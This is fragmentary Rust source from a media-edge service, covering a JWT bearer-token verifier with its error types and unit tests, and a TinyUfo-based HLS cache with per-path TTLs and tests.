self.db.collection("sessions").document(session_id)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subcollections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self._delete_collection(session_ref.collection("hypotheses"))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self._delete_collection(session_ref.collection("analysis_results"))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self._delete_collection(session_ref.collection("literature"))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session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session_ref.delete()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logger.info(f"Deleted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_delete_collection(self, collection_ref, batch_size: int = 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all documents in a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collection_ref.limit(batch_size).stream()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doc.reference.delete()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deleted &gt;= batch_size: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Recursively delete remaining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self._delete_collection(collection_ref, batch_size)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update_session_status(self, session_id: str, status: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session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New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session_ref = self.db.collection("sessions").document(session_id)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session_ref.update({"status": status})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get_hypothesis(self, session_id: str, hypothesis_id: str) -&gt; Hypothesis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hypothesis_id: Hypothesis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 instance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hyp_ref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self.db.collection("sessions")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.document(hypothesis_id)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hyp_doc = hyp_ref.get()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hyp_doc.exists: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Hypothesis.from_dict(hyp_doc.to_dict())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tested: bool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hypotheses with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min_confidence: Minimum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tested: Filter by tested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Hypothesis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self.db.collection("sessions").document(session_id).collection("hypotheses")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min_confidence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query.where("confidence", "&gt;=", min_confidence)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tested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query.where("tested", "==",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query.stream():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hypotheses.append(Hypothesis.from_dict(doc.to_dict()))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f"FirestoreBackend(project={self.project_id})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/persistence/firestore_backend.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/persistence/storage_backend.py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"""Cloud Storage Backend: Storage for artifacts (datasets, plots, reports).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Upload/download of large files (datasets, plots, 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Organized storage by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URL generation for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"Cloud Storage SDK not installed. Install with: pip install google-cloud-storage",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CloudStorageBackend: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 Storage persistence backend for large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{session_id}/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datasets/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input_data.csv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plots/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analysis_001.png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final_report.pdf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analysis_script.py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create_bucket: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Cloud Storage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bucket_name: Storage bucket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create_bucket: Whether to create bucket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STORAGE_AVAILABLE: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RuntimeError("Cloud Storage SDK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self.bucket_name = bucket_name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storage.Client(project=project_id)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 create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self.bucket = self.client.bucket(bucket_name)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self.bucket.exists():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create_bucket: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self.bucket.create(location="US")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logger.info(f"Created bucket {bucket_name}")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ValueError(f"Bucket {bucket_name} does not exist")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logger.info(f"Using existing bucket {bucket_name}")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bucket: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upload_file(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 = "datasets",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"""Upload a file to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Local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artifact_type: Type of artifact (datasets, plots, reports,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Optional custom filename (uses original name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URL of uploaded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filename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 = Path(file_path).name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blob_path = f"sessions/{session_id}/{artifact_type}/{filename}"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self.bucket.blob(blob_path)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blob.upload_from_filename(file_path)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logger.info(f"Uploaded {file_path} to gs://{self.bucket_name}/{blob_path}")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f"gs://{self.bucket_name}/{blob_path}"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upload_bytes(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 = "datasets",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"""Upload bytes to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Byte data to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artifact_type: Type of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content_type: Optional content type (e.g., "image/png")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URL of uploaded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blob_path = f"sessions/{session_id}/{artifact_type}/{filename}"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self.bucket.blob(blob_path)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blob.content_type = content_type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blob.upload_from_string(data)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logger.info(f"Uploaded {len(data)} bytes to gs://{self.bucket_name}/{blob_path}")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f"gs://{self.bucket_name}/{blob_path}"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download_file(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 = "datasets",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"""Download a file from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artifact_type: Type of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local_path: Optional local save path (uses filename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blob_path = f"sessions/{session_id}/{artifact_type}/{filename}"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self.bucket.blob(blob_path)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local_path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local_path =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blob.download_to_filename(local_path)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logger.info(f"Downloaded gs://{self.bucket_name}/{blob_path} to {local_path}")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local_path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download_bytes(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 = "datasets",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"""Download file as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artifact_type: Type of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 contents as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blob_path = f"sessions/{session_id}/{artifact_type}/{filename}"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self.bucket.blob(blob_path)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blob.download_as_bytes()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logger.info(f"Downloaded {len(data)} bytes from gs://{self.bucket_name}/{blob_path}")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list_artifacts(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artifacts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artifact_type: Optional artifact type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blob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 = f"sessions/{session_id}/"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artifact_type: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 += f"{artifact_type}/"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blobs = self.bucket.list_blobs(prefix=prefix)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[blob.name for blob in blobs]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get_public_url(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 = "datasets",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expiration_hours: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signed public URL for sharing.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artifact_type: Type of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expiration_hours: URL expiration in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 public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blob_path = f"sessions/{session_id}/{artifact_type}/{filename}"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self.bucket.blob(blob_path)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blob.generate_signed_url(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expiration=timedelta(hours=expiration_hours),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delete_artifact(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 = "datasets",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an artifact.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artifact_type: Type of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blob_path = f"sessions/{session_id}/{artifact_type}/{filename}"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self.bucket.blob(blob_path)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logger.info(f"Deleted gs://{self.bucket_name}/{blob_path}")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delete_session_artifacts(self, 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all artifacts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 = f"sessions/{session_id}/"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blobs = self.bucket.list_blobs(prefix=prefix)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blob in blobs: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blob.delete()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logger.info(f"Deleted {deleted_count} artifacts for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f"CloudStorageBackend(bucket={self.bucket_name})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/persistence/storage_backend.py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apps/aiyou_stack/aiyou-fastapi-services/kubernetes/base/judge6-deployment.yaml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Hybrid Enforcement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3-layer architecture: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p99 ≤ 90ms, Coverage ≥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latency_budget_ms: "90"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coverage_target: "0.98"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layers.yaml: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gemini-policy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model_id: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pytorch-neural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model_path: /models/judge6-neural.pt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rules-engine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rules_path: /config/rules.yaml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AUTH_001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"Require authentication for all endpoints"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pattern: "@app.route.*methods.*POST.*"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requires: "auth_decorator"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VALIDATE_001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"Input validation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pattern: "request.(json|form|args)"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requires: "validation_schema"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SQL_001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"Prevent SQL injection"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pattern: "(execute|executemany).*%s"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"Use parameterized queries"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XSS_001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"Prevent XSS"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pattern: "render_template_string.*request"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"Never render user input directly"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judge6-sa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workload: judge-enforcement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Pod topology spread for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topologySpreadConstraints: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maxSkew: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topologyKey: topology.kubernetes.io/zone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whenUnsatisfiable: ScheduleAnyway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Layer 1: Gemini Policy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gemini-layer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gcr.io/pnkln-core-stack/judge6-gemini:latest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LATENCY_BUDGET_MS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fieldPath: metadata.namespace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/health/live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Layer 2: PyTorch Neural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pytorch-layer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gcr.io/pnkln-core-stack/judge6-pytorch:latest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CUDA_VISIBLE_DEVICES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"/models/judge6-neural.pt"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/dev/shm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/health/live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Layer 3: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rules-layer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gcr.io/pnkln-core-stack/judge6-rules:latest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RULES_PATH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"/config/rules.yaml"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rules-config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/health/live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Sidecar: Latency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latency-monitor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gcr.io/pnkln-core-stack/latency-monitor:latest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P99_TARGET_MS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ALERT_WEBHOOK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"http://alertmanager.monitoring:9093/api/v1/alerts"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SCRAPE_INTERVAL_SECONDS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driver: gcsfuse.csi.storage.gke.io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bucketName: pnkln-core-stack-model-weights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mountOptions: "implicit-dirs,file-mode=444,dir-mode=555"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rules-config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judge6-rules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medium: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sizeLimit: 8Gi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seccompProfile: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RuntimeDefault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"judge6-backend-config"}'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ClientIP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timeoutSeconds: 10800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cloud.google.com/v1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BackendConfig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judge6-backend-config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requestPath: /health/ready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timeoutSec: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sampleRate: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apps/aiyou_stack/aiyou-fastapi-services/kubernetes/base/judge6-deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/kubernetes/base/namespaces.yaml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- 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Operating Posture Framework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4-tier namespace structure for workload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ShadowTag-v2jr-governance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compliance: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"Judge 6 hybrid enforcement system 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autogen-orchestration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"Multi-agent orchestration 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"llm-routing"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"LLM routing and cognitive services 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"watermarking"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pod-security.kubernetes.io/audit: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pod-security.kubernetes.io/warn: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"Content watermarking and provenance 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pnkln.io/component: "observability"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pod-security.kubernetes.io/enforce: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"Monitoring, logging, and observability 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apps/aiyou_stack/aiyou-fastapi-services/kubernetes/base/namespaces.yaml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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/crypto_client.py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CryptoGate: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get_deposit_address(currency: str = "BTC")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Bag Man.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direct deposit address from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the burn address if not set (Safety)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wallet = os.getenv(f"CRYPTO_WALLET_{currency}", "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa")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as URI for QR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currency == "BTC":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f"bitcoin:{wallet}"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currency == "ETH":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f"ethereum:{wallet}"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wallet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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/crypto_client.py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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/entitlements.py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libs.monetization.pricing_matrix import SubscriptionTier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EntitlementManager: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Gatekeeper.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Determines which layers of the 'Onion' are accessible based on Payment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Admin Overrides (Severability).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self._admin_overrides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get_enabled_features(self, tier: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enum string back to object if needed, or handle string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tier_enum = SubscriptionTier(tier)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tier_enum = SubscriptionTier.BASIC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FEATURES (Tier 1: Basic Defense)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"CORE_DEFENSE",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"SILENCER",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"TROOP_B",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"LAYER_14_INFRA_OPTIMIZER",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"LAYER_15_SUPPLY_CHAIN_SEC",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"LAYER_16_PRODUCT_GATE",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"LAYER_18_COMPETITIVE_CHECK",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"LAYER_19_MILESTONE_TRACKER",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EU COMPLIANCE (Tier 2: +30%)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tier_enum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SubscriptionTier.EU_COMPLIANCE,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SubscriptionTier.FINANCIAL,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SubscriptionTier.SOVEREIGN,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features.append("EU_26_GDPR")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features.append("PRIVACY_SHIELD")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features.append("LAYER_12_REGULATORY_MATRIX")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features.append("LAYER_13_ADTECH_STANDARDS")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FINANCIAL LAYER (Tier 3: Dynamic)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tier_enum in [SubscriptionTier.FINANCIAL, SubscriptionTier.SOVEREIGN]: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features.append("FIN_CRIMES_MODULE")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features.append("MONTE_CARLO_RISK")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features.append("ACTIVE_DEFENSE_METRICS")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features.append("LAYER_17_BLOCKCHAIN_GATE")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features.append("LAYER_20_IMPACT_MODEL")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SOVEREIGN (Tier 30: $1M)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tier_enum == SubscriptionTier.SOVEREIGN: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features.append("SOVEREIGN_RIGHTS")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features.append("ZERO_KNOWLEDGE")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features.append("BRAKE_OVERRIDE")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features.append("LAYER_21_IQ_160_LOCK")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Admin Overrides (The "Toggle")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feat, enabled in self._admin_overrides.items():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enabled and feat not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features.append(feat)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not enabled and feat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features.remove(feat)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admin_override(self, feature: str, enable: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"""Severability Switch.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 Admin to turn specific layers ON/OFF regardless of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🔧 ADMIN OVERRIDE: {feature} -&gt; {enable}")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self._admin_overrides[feature] = enable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check_access(self, tier: str, required_feature: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self.get_enabled_features(tier)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required_feature in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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/entitlements.py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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/pricing_matrix.py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// PRICING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Doctrine: "Generational Wealth"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BASIC = "BASIC_DEFENSE"  # $3k/mo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EU_COMPLIANCE = "EU_26_SHIELD"  # Basic + 30%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 = "FINANCIAL_DYNAMIC"  # Monte Carlo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SOVEREIGN = "TIER_30_SOVEREIGN"  # $1M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BASE_SUBSCRIPTION_CENTS = 3000 * 100  # $3,000.00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TIER_30_PRICE_USD = 100000000  # $1,000,000.00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CURRENCY = "usd"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PRODUCT_NAME = "ShadowTag Tier 30: RED SHIRT PROTOCOL"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"Full unadulterated access used by Vertical Sovereigns. We build your AI and System while you sleep."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calculate_price(tier: SubscriptionTier, risk_surface_score: int = 10)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"""Calculates dynamic pricing based on '10 Fingers &amp; Monte Carlo' Doctrine."""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 = BASE_SUBSCRIPTION_CENTS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 == SubscriptionTier.BASIC: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 == SubscriptionTier.EU_COMPLIANCE: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EU Premium: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int(price * 1.30)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 == SubscriptionTier.FINANCIAL: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FINANCIAL LAYER: Monte Carlo Dynamic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"10 Fingers": We assume 'risk_surface_score' represents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$500 per risk point premium.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risk_premium = risk_surface_score * 500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Monte Carlo Variance (0.8x to 1.5x based on market volatility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volatility = random.uniform(0.8,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total_raw = price + risk_premium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final_price = int(total_raw *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 == SubscriptionTier.SOVEREIGN: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TIER_30_PRICE_USD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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/pricing_matrix.py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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/stripe_client.py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.pricing_matrix import TIER_30_PRICE_USD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key for build - Replace with Secret Manager in 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os.getenv("STRIPE_API_KEY", "sk_test_mock_key_antigravity")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create_checkout_session(success_url: str, cancel_url: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Card Reader.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Redirects to a pre-configured Stripe Payment Link (No-Code).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FLASH LIQUIDITY: Use the link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payment_link = os.getenv("STRIPE_PAYMENT_LINK")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payment_link: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payment_link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Mock if no link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f"https://checkout.stripe.com/mock_hosted_page?amount={TIER_30_PRICE_USD}"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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/monetization/stripe_client.py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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/treasury/budget.py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.ledger import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BudgetEnforcer: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"""Enforces spending rules based on the Ledger."""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ledger: Ledger):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self.ledger =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Spending limits per category (Mock rules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"compute": 100.0,  # Max $100 compute per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"api_call": 1.0,  # Max $1 per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can_spend(self, amount: float, category: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spend is within limits and funds are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 in self.limits and amount &gt; self.limits[category]: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actual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self.ledger.get_balance() &gt;=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approve_transaction(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"""Attempt to authorize and execute a debit."""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self.can_spend(amount, category):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self.ledger.debit(amount, requester, f"[{category}]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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/treasury/budget.py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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/treasury/ledger.py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War Chest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inflows (Revenue) and outflows (Costs).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storage_path: str = "/tmp/treasury_ledger.json"):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storage_path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self.balance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os.path.exists(self.storage_path):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open(self.storage_path)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self.balance = data.get("balance",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self.transactions = data.get("transactions",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print(f"Error loading ledger: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open(self.storage_path,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json.dump({"balance": self.balance, "transactions": self.transactions},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saving ledger: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credit(self, amount: float, source: str, description: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funds to the War Chest."""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amount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ValueError("Credit amount must be positive")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self.balance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self._record("CREDIT", amount, source, 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debit(self, amount: float, requester: str, reason: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"""Deduct funds from the War Chest."""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amount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ValueError("Debit amount must be positive")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self.balance &gt;= amount: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self.balance -=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self._record("DEBIT", amount, requester,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_record(self, type: str, amount: float, entity: str, description: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"entity": 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"balance_after": self.balance,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get_balance(self)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get_history(self)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apps/aiyou_stack/aiyou-fastapi-services/libs_deprecated/treasury/ledger.py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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/architecture/mcp-server-deployment.yaml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Code Execution Server -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Production-grade Kubernetes manifests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gVisor runtime (runsc) for sandboxing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Horizontal Pod Autoscaler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Network Policy (egress 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Istio VirtualService (canary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Service Monitor (Prometheus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istio-injection: enabled  # Enable Istio sidecar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ConfigMap for MCP Server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Server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HOST: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WORKERS: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Sandbox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SANDBOX_RUNTIME: "runsc"  # gVisor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SANDBOX_TIMEOUT_SECONDS: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SANDBOX_MAX_CPU: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SANDBOX_MAX_MEMORY_MB: "512"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SANDBOX_MAX_DISK_MB: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SANDBOX_POOL_SIZE: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MAX_CODE_LENGTH: "10000"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ALLOWED_IMPORTS: "json,math,datetime,typing,dataclasses,itertools,functools,collections,re"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Audit configuration (BigQuery)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BIGQUERY_DATASET: "mcp_audit_logs"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BIGQUERY_TABLE: "code_executions"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for BigQuery Service Account (create manually)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kubectl create secret generic mcp-bigquery-sa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--from-file=key.json=./service-account-key.json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-n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mcp-bigquery-sa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will be populated by kubectl create secret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Deployment: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  # Start with 3 replicas, HPA will scale up/down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Prometheus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Use gVisor runtime class (must be configured on GKE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runtimeClassName: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Service account for BigQuery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mcp-server-sa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Security context (defense in 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gcr.io/PROJECT_ID/mcp-server:latest  # Replace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Environment variables from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mcp-server-config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Environment variables from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BIGQUERY_PROJECT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"PROJECT_ID"  # Replace with actual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GOOGLE_APPLICATION_CREDENTIALS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"/var/secrets/google/key.json"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Volume mounts for BigQuery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bigquery-sa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/var/secrets/google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limits (enforced by Kubernetes)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    # 2 CPUs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   # 4GB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Liveness probe (restart if unhealthy)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Readiness probe (remove from load balancer if not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context (container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bigquery-sa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secretName: mcp-bigquery-sa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Pod anti-affinity (spread across nodes for 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 for MCP Server (Workload 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 binding (replace with actual GCP service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mcp-server@PROJECT_ID.iam.gserviceaccount.com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Service: Internal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  # Internal only (no external exposure)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Horizontal Pod Autoscaler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Scale based on CPU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  # Target 70%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Scale based on memory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  # Target 80%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Scale based on request rate (requires custom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mcp_executions_per_second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"100"  # 100 executions/sec per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Scaling behavior (prevent flapping)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  # Increase by 50%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2   # Or add 2 pods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  # Wait 5 minutes before scaling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  # Decrease by 10%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Network Policy: Egress Blocking (Security)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mcp-server-network-policy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Ingress: Allow only from Istio ingress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istio-system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Egress: Allow ONLY internal services (block internet)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DNS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kube-system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UDP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BigQuery API (Google Cloud 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Block all other egress (no internet access from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This prevents data exfiltration even if sandbox is compromised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Istio VirtualService: Canary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networking.istio.io/v1beta1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VirtualService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canary traffic based on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x-canary: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exact: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destination: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subset: v2  # New version (canary)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destination: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subset: v1  # Stable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90  # 90% of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destination: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subset: v2  # New version (canary)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10  # 10% of traffic (canary)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Istio DestinationRule: Subsets for Canary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networking.istio.io/v1beta1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DestinationRule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trafficPolicy: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Connection pool settings (optimize for high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tcp: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maxConnections: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http1MaxPendingRequests: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http2MaxRequests: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maxRequestsPerConnection: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Outlier detection (circuit breaker)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outlierDetection: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consecutiveErrors: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baseEjectionTime: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maxEjectionPercent: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PodDisruptionBudget: Maintain availability during disruptions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mcp-server-pdb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2  # Always keep at least 2 pods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ServiceMonitor: Prometheus Scraping (if using Prometheus Operator)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monitoring.coreos.com/v1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RBAC: Service Account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reading ConfigMaps (for dynamic config reload)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["configmaps"]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"list", "watch"]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reading Secrets (for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["secrets"]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mcp-server-rolebinding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apiGroup: rbac.authorization.k8s.io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mcp-server-sa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Documentation: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GKE cluster with gVisor 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gcloud container clusters create mcp-cluster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--zone=us-central1-a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--enable-sandbox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--addons=Istio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Workload Identity configured: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gcloud iam service-accounts create mcp-server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--project=PROJECT_ID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gcloud projects add-iam-policy-binding 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--member="serviceAccount:mcp-server@PROJECT_ID.iam.gserviceaccount.com"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--role="roles/bigquery.dataEditor"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mcp-server@PROJECT_ID.iam.gserviceaccount.com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--member "serviceAccount:PROJECT_ID.svc.id.goog[mcp-system/mcp-server-sa]"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Build and push Docker image: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docker build -t gcr.io/PROJECT_ID/mcp-server:latest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docker push gcr.io/PROJECT_ID/mcp-server:latest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namespace and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kubectl apply -f mcp-server-deployment.yaml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Verify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kubectl get pods -n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kubectl logs -n mcp-system -l app=mcp-server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health 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kubectl run test -it --rm --image=curlimages/curl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curl http://mcp-server.mcp-system/health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CANARY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Deploy new version with version: v2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Gradually increase weight in VirtualService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Monitor metrics in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Rollback if error rate increases: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kubectl rollout undo deployment/mcp-server -n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Prometheus: http://prometheus.istio-system:9090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Grafana: http://grafana.istio-system:3000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Metrics: kubectl port-forward -n mcp-system svc/mcp-server 8080:80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  curl http://localhost:8080/metrics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Manual: kubectl scale deployment/mcp-server -n mcp-system --replicas=10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Automatic: HPA will scale based on CPU/memory/custom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gVisor: Verify with: kubectl get pod &lt;pod-name&gt; -n mcp-system -o jsonpath='{.spec.runtimeClassName}'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Network Policy: kubectl describe networkpolicy mcp-server-network-policy -n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Audit Logs: SELECT * FROM `PROJECT_ID.mcp_audit_logs.code_executions` ORDER BY timestamp DESC LIMIT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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/architecture/mcp-server-deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/notebooks/01_mcp_validation.py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"""MCP Code Execution Validation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in Vertex AI Workbench for Hour 0-24 technical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Latency validation (p99 ≤75ms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Security validation (sandbox escape attempts)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 analysis (token reduction vs. traditional tool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Reliability testing (success rate ≥99.9%)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01_mcp_validation.py --mcp-url http://mcp-server.mcp-system --runs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test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mcp_server_url: str = "http://mcp-server.mcp-system"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num_runs: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"validation-test"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"validation-001"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scenario for code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 # simple_rules, complex_calculation, multi_step, edge_case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workload_percentage: int  # % of total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workload distribution (based on real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TEST_SCENARIOS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40% - Simple rules (deterministic, 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name="S3 retention policy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category="simple_rules",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= {"retention_days": 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current_age =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current_age &lt; policy["retention_days"]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name="GDPR data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category="simple_rules",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data_fields = ["email", "name", "address"]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pii_fields = {"email", "name", "address", "ssn", "phone"}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bool(set(data_fields) &amp; pii_fields)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name="Compliance tag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category="simple_rules",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required_tags = {"compliance", "owner", "env"}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resource_tags = {"compliance": "gdpr", "owner": "team-a", "env": "prod"}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required_tags.issubset(resource_tags.keys())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name="Data residency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category="simple_rules",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allowed_regions = {"us-east-1", "us-west-2", "eu-west-1"}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bucket_region = "us-east-1"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bucket_region in allowed_regions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35% - Complex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name="GDPR deletion cascade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category="complex_calculation",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user data across multiple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"profiles": [{"id": 1, "user_id": 123}],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"orders": [{"id": 1, "user_id": 123}, {"id": 2, "user_id": 123}],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"analytics": [{"id": i, "user_id": 123}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total records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total_deletions = sum(len(records) for records in user_data.values())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total_deletions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name="Cost allocation across departments",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category="complex_calculation",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resource costs by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"engineering": [100, 200, 150],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"marketing": [50, 75, 60],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"sales": [25, 30, 28]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percentage for each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total_cost = sum(sum(dept_costs) for dept_costs in costs.values())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dept: round(sum(dept_costs) / total_cost * 100,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dept, dept_costs in costs.items()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expected_result={"engineering": 52.94, "marketing": 21.76, "sales": 9.80},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name="Risk score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category="complex_calculation",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security risk score based on multiple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"public_exposure": 8,      # 0-10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"unencrypted_data":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"missing_mfa":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"outdated_software":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"privileged_access":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"public_exposure":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"unencrypted_data":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"missing_mfa":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"outdated_software":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"privileged_access":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Weighted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round(sum(factors[k] * weights[k] for k in factors),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expected_result=7.65,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20% - Multi-step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name="ShadowTag cross-region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category="multi_step",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multi-region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 = ["us-east-1", "eu-west-1", "ap-south-1"]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compliance_rules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"us-east-1": ["HIPAA", "SOC2"],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"eu-west-1": ["GDPR", "ISO27001"],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"ap-south-1": ["ISO27001"]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all regions have at least one compliance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region: bool(rules)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region, rules in compliance_rules.items()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expected_result={"us-east-1": True, "eu-west-1": True, "ap-south-1":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name="Multi-cloud policy sync",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category="multi_step",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policy sync across clouds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aws_policies = {"s3-encryption": True, "vpc-logging":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gcp_policies = {"gcs-encryption": True, "vpc-logging":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azure_policies = {"blob-encryption": True, "vnet-logging":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 policy drift (Azure missing VPC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compliant = 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aws_policies["vpc-logging"],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gcp_policies["vpc-logging"],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azure_policies["vnet-logging"]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{"compliant": compliant, "drift": not compliant}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expected_result={"compliant": False, "drift":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5% - Edge cases (ambiguous, may need LLM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name="Ambiguous policy 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category="edge_case",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case: empty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policy.get("retention_days", 30)  # Default to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violation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SECURITY_TEST_SCENARIOS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name="Blocked import: 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code="import os; result = os.listdir('/')",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name="Blocked import: subprocess",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code="import subprocess; result = subprocess.run(['whoami'])",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name="Blocked function: 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code="result = eval('1+1')",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name="Blocked function: exec",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code="exec('result = 1+1')",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name="Blocked pattern: __import__",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code="result = __import__('os').listdir('/')",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workload_percentage=0,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MCPClient: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"""Async HTTP client for MCP code execution server"""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httpx.AsyncClient(timeout=30.0)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 via MCP server"""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self.client.post(f"{self.base_url}/execute", json=request)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health_check(self)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MCP server is healthy"""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self.client.get(f"{self.base_url}/health")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HTTP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self.client.aclose()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single validation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result_matches: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all validation runs"""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total_runs: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successful_runs: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failed_runs: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blocked_runs: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p90_latency_ms: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p999_latency_ms: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Category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category_stats: dict[str, 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security_tests_passed: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security_tests_failed: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go_decision: str  # "GO", "PIVOT", "ABORT"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decision_rationale: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"""Runs validation tests and collects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ValidationConfig):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MCPClient(config.mcp_server_url)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self.results: list[ValidationResult]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run_scenario(self, scenario: TestScenario, run_number: int)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 single test scenario"""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self.client.execute_code(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code=scenario.code,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user_id=self.config.user_id,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session_id=f"{self.config.session_id}-{run_number}",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result matches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result_matches = response.get("success") == scenario.expected_success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scenario_name=scenario.name,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category=scenario.category,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success=response.get("success",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expected_success=scenario.expected_success,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result_matches=result_matches,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error=response.get("error"),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security_violations=response.get("security_checks",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scenario_name=scenario.name,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category=scenario.category,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expected_success=scenario.expected_success,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result_matches=False,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security_violations=[],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run_all_scenarios(self):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test scenarios according to workload distribution"""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validation with {self.config.num_runs} runs...")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print(f"MCP Server: {self.config.mcp_server_url}")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server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is_healthy = await self.client.health_check()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is_healthy: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Exception(f"MCP server is not healthy: {self.config.mcp_server_url}")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MCP server is healthy\n")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run distribution based on workload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run_distribution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scenario in TEST_SCENARIOS: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num_runs = int(self.config.num_runs * scenario.workload_percentage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run_distribution.extend([scenario] * num_runs)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remaining runs with balanced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len(run_distribution) &lt; self.config.num_runs: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run_distribution.append(TEST_SCENARIOS[len(run_distribution) % len(TEST_SCENARIOS)])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print(f"Running {len(run_distribution)} functional tests...")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scenario in enumerate(run_distribution):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self.run_scenario(scenario,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 + 1) % 100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Progress: {i + 1}/{len(run_distribution)} runs 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security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print(f"\nRunning {len(SECURITY_TEST_SCENARIOS)} security tests...")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scenario in enumerate(SECURITY_TEST_SCENARIOS):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self.run_scenario(scenario, 9000 +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print("\n✓ All validation tests completed\n")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analyze_results(self) -&gt; ValidationSummary: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validation results and generate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functional vs security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functional_results = [r for r in self.results if r.category != "security"]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security_results = [r for r in self.results if r.category == "security"]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success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successful_runs = sum(1 for r in functional_results if r.success and r.result_matches)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failed_runs = sum(1 for r in functional_results if not r.success and r.expected_success)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blocked_runs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r in functional_results if not r.success and not r.expected_success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 = successful_runs / len(functional_results) * 100 if functional_results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[r.execution_time_ms for r in functional_results]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p50_latency = latencies[int(len(latencies) * 0.50)] if latencies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p90_latency = latencies[int(len(latencies) * 0.90)] if latencies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latencies[int(len(latencies) * 0.99)] if latencies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p999_latency = latencies[int(len(latencies) * 0.999)] if latencies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mean_latency = statistics.mean(latencies) if latencies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Category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category_stats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["simple_rules", "complex_calculation", "multi_step", "edge_case"]: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cat_results = [r for r in functional_results if r.category == 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cat_latencies = [r.execution_time_ms for r in cat_results]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category_stats[category]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"count": len(cat_results),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"success_rate": sum(1 for r in cat_results if r.success)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 len(cat_results)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"p99_latency_ms": sorted(cat_latencies)[int(len(cat_latencies) * 0.99)],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"mean_latency_ms": statistics.mean(cat_latencies),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security_tests_passed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r in security_results if not r.success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Should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security_tests_failed = sum(1 for r in security_results if r.success)  # Should NOT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go_decision, decision_rationale = self._make_go_decision(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security_tests_failed,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total_runs=len(functional_results),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successful_runs=successful_runs,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failed_runs=failed_runs,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blocked_runs=blocked_runs,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success_rate=success_rate,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p50_latency_ms=p50_latency,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p90_latency_ms=p90_latency,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p99_latency_ms=p99_latency,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p999_latency_ms=p999_latency,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mean_latency_ms=mean_latency,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category_stats=category_stats,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security_tests_passed=security_tests_passed,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security_tests_failed=security_tests_failed,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go_decision=go_decision,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decision_rationale=decision_rationale,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_make_go_decision(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security_failures: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GO/NO-GO decision based on validation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ABORT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p99_latency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"ABORT", f"p99 latency ({p99_latency:.1f}ms) exceeds 90ms SLA"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success_rate &lt; 99.0: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"ABORT", f"Success rate ({success_rate:.1f}%) below 99% requirement"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security_failures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"ABORT", f"{security_failures} security tests failed (should be blocked)"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PIVOT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p99_latency &gt;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"PIVOT",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f"p99 latency ({p99_latency:.1f}ms) between 75-90ms, recommend AutoGen-only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p99_latency &lt;= 75 and success_rate &gt;= 99.9 and security_failures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f"All criteria met: p99={p99_latency:.1f}ms, success={success_rate:.1f}%, security=PASS",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"PIVOT", "Some criteria met, recommend partial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print_summary(self, summary: ValidationSummary):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validation summary to console"""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print("MCP CODE EXECUTION VALIDATION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print("LATENCY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p50:  {summary.p50_latency_ms:7.2f}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p90:  {summary.p90_latency_ms:7.2f}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p99:  {summary.p99_latency_ms:7.2f} ms {'✓' if summary.p99_latency_ms &lt;= 75 else '✗ EXCEEDS TARGET'}",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p999: {summary.p999_latency_ms:7.2f}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Mean: {summary.mean_latency_ms:7.2f}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print("RELIABILITY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runs:      {summary.total_runs}")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Successful:      {summary.successful_runs} ({summary.success_rate:.2f}%)")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Failed:          {summary.failed_runs}")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Blocked:         {summary.blocked_runs}")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Success rate:    {summary.success_rate:.2f}% {'✓' if summary.success_rate &gt;= 99.9 else '✗ BELOW TARGET'}",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print("CATEGORY BREAKDOWN")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stats in summary.category_stats.items():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{category:20s}: {stats['count']:4d} runs,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f"p99={stats['p99_latency_ms']:6.2f}ms,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f"success={stats['success_rate']:5.1f}%",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print("SECURITY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Tests passed (blocked): {summary.security_tests_passed}")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Tests failed (allowed): {summary.security_tests_failed} {'✓' if summary.security_tests_failed == 0 else '✗ SECURITY RISK'}",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print("GO/NO-GO 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Decision:   {summary.go_decision}")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Rationale:  {summary.decision_rationale}")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detailed results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results_file = f"validation_results_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"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open(results_file,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{"summary": asdict(summary), "detailed_results": [asdict(r) for r in self.results]},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print(f"Detailed results saved to: {results_file}")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 up resources"""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argparse.ArgumentParser(description="MCP Code Execution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parser.add_argument("--mcp-url", default="http://mcp-server.mcp-system", help="MCP server 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parser.add_argument("--runs", type=int, default=1000, help="Number of validation runs")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ValidationConfig(mcp_server_url=args.mcp_url, num_runs=args.runs)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runner = ValidationRunner(config)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runner.run_all_scenarios()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runner.analyze_results()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runner.print_summary(summary)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runner.close()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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/notebooks/01_mcp_validation.py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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/security/SECURITY_AUDIT_CHECKLIST.md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Code Execution Security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FedRAMP Moderate Compliance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Compliance:** FedRAMP Moderate (NIST 800-53 Rev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Timeline:** ≤6 months to Authorization to Operate (ATO)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Partner:** 3PAO (Third-Party Assessment Organization)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checklist maps MCP code execution architecture to NIST 800-53 security controls required for FedRAMP Moderate authorization. It identifies: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**Controls already satisfied** by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**Controls with gaps** requiring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**Controls not applicable** to this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🔍 **Controls requiring 3PAO validation** (evidence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Statistics:**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NIST 800-53 Rev 5 controls: 421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Applicable to MCP system: ~280 (67%)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Currently satisfied: ~220 (79%)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Gaps requiring remediation: ~60 (21%)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remediation time: 5-9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GAPS (Must Fix Before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gaps are **showstoppers** for FedRAMP authorization. Must be remediated before 3PAO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❌ gVisor Not on FedRAMP APL (Approved Products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**Control:** SA-4 (Acquisition Process), SA-22 (Unsupported System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(runsc runtime) is not on FedRAMP Approved Products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FedRAMP requires all security-critical components to be APL-approved OR have equivalency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HIGH - Potential showstopper without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A: APL Equivalency White Paper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2-3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Document gVisor security guarantees (kernel isolation, syscall interception)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Map to traditional VM isolation controls (AC-6, SC-7, SI-7)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Provide third-party audit reports (Google's gVisor security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Demonstrate NIST 